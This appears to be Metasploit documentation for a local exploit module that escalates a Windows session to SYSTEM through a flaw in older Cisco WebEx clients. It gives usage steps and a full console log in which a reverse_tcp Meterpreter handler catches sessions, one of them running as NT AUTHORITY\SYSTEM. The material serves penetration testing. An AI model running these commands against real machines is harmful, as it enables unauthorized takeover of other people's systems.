## Description

  This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found
  in Cisco's WebEx client software for versions below v33.6.0.655.

## Vulnerable Application

  Cisco WebEx v33.3.8.7 and below

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get a session
  4. Do: ```use exploit/windows/local/webexec```
  5. Do: ```set SESSION <session>```
  6. Do: ```run```
  7. You should get an elevated session.

## Scenarios

### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86

  ```

  msf5 > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.37.136
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500

  meterpreter > getuid
  Server username: WIN-MGMN7ND70I1\a_user
  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) > use exploit/windows/local/webexec 
  msf5 exploit(windows/local/webexec) > set session 1
  session => 1
  msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(windows/local/webexec) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] Checking service exists...
  [*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
  [*] Launching service...
  [*] Sending stage (179779 bytes) to 192.168.37.136
  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
  [*] Service started...

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > 

  ```
